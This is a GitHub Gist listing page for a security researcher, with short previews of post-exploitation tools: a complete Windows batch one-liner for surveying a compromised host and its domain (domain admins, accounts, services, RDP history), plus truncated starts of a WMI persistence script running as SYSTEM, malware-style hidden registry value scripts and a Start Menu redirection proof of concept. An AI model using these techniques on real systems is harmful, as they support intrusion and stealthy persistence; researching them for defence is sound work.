Skip to content

Instantly share code, notes, and snippets.

Avatar

Kyle Hanslovan KyleHanslovan

View GitHub Profile
@KyleHanslovan
KyleHanslovan / DomainEnumeration.bat
Created Jun 25, 2016
Post-exploitation host/domain survey using native Windows commands.
View DomainEnumeration.bat
whoami & hostname & ipconfig /all & net user /domain 2>&1 & net group /domain 2>&1 & net group "domain admins" /domain 2>&1 & net group "Exchange Trusted Subsystem" /domain 2>&1 & net accounts /domain 2>&1 & net user 2>&1 & net localgroup administrators 2>&1 & netstat -an 2>&1 & tasklist 2>&1 & sc query 2>&1 & systeminfo 2>&1 & reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" 2>&1
@KyleHanslovan
KyleHanslovan / WMIPersistence.mof
Created Jun 8, 2016
VBS based ActiveScriptEventConsumer useful for launching applications at startup as SYSTEM.
View WMIPersistence.mof
/*
Author: Kyle Hanslovan
Contact: @KyleHanslovan
License: MIT
Date: 07/18/2014
*/
#PRAGMA NAMESPACE ("\\\\.\\root\\subscription")
instance of ActiveScriptEventConsumer as $Consumer
View DeleteNullRegValue.py
from ctypes import *
from ctypes.wintypes import *
import winreg
NTSTATUS = c_long
PVOID = c_void_p
PWSTR = c_wchar_p
OBJ_CASE_INSENSITIVE = 0x00000040
@KyleHanslovan
KyleHanslovan / CreateNullRegValue.py
Created Jun 3, 2016
Script which uses Native APIs to create a "hidden" registry value similar to Powerliks and Kovter malware.
View CreateNullRegValue.py
from ctypes import *
from ctypes.wintypes import *
import winreg
NTSTATUS = c_long
PVOID = c_void_p
PWSTR = c_wchar_p
OBJ_CASE_INSENSITIVE = 0x00000040
@KyleHanslovan
KyleHanslovan / StartMenuRedirection.py
Last active Aug 18, 2016
PoC for Start Menu Redirection
View StartMenuRedirection.py
import os
import sys
import pythoncom
from win32com.shell import shell, shellcon
def create_shortcut(dest_path, target_path):
"""
"""